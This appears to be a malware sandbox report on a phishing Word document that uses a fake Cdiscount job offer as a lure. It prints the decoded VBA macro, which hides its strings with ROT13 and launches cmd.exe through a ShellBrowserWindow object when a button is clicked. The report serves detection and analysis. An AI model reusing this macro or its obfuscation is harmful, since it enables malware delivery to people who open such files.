MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that use ShellExecute to launch a second-stage payload. The macro attempts to obfuscate the executable name as 'pzq.rkr' and uses a GetObject call with a suspicious argument. The document body presents a job offer to lure the user into interacting with the malicious content.
Heuristics 4
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Function yolo() Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880")) obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0 -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2255 bytes |
SHA-256: c69b280aeca38bad7163e1d2953f26541110919ee8224bfba1952936d4a54803 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"
Function A(Test$) As String
Dim tt As Long, x As Integer, y As Integer
For tt = 1 To Len(Test$)
y% = 0
x% = Asc(Mid$(Test$, tt, 1))
If (x% > 64 And x% < 91) Or (x% > 96 And x% < 123) Then
y% = 13
x% = x% - y%
If x% < 97 And x% > 83 Then x% = x% + 26 Else If x% < 65 Then x% = x% + 26
End If
Mid$(Test$, tt, 1) = Chr$(x%)
Next tt
A = Test$
End Function
Function yolo()
Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880"))
obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0
ActiveDocument.BuiltInDocumentProperties("category") = "1"
End Function
Private Sub CommandButton1_Click()
If ActiveDocument.BuiltInDocumentProperties("category") = "0" Then
yolo
End If
Selection.ParagraphFormat.Alignment = wdAlignParagraphLeft
Selection.Font.Size = 11
Selection.TypeText Text:="Vous l'aurez peut-être découvert, mais il s'agit de Cdiscount. Le poste est disponible à Bordeaux ou Paris. Selon profile le télétravail est possible avec déplacement occasionnel dans les locaux (à minima 2 jours par quinzaine)."
Selection.TypeParagraph
Selection.TypeText Text:="En plus du salaire très attractif, vous bénéficierez d'une excellente mutuelle, d'une crèche d'entreprise et de tarifs préférentiels sur l'ensemble des plateformes Cdiscount."
Selection.TypeParagraph
Selection.Font.Bold = True
Selection.ParagraphFormat.Alignment = 1
Selection.TypeText Text:="Cdiscount est bien + que vous ne le croyez : venez grandir avec nos équipes d'experts, cultiver votre talent et révolutionner le e-commerce tout en partageant les valeurs qui font notre force !"
ActiveDocument.Shapes("Picture 1").Select
Selection.ShapeRange.Delete
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.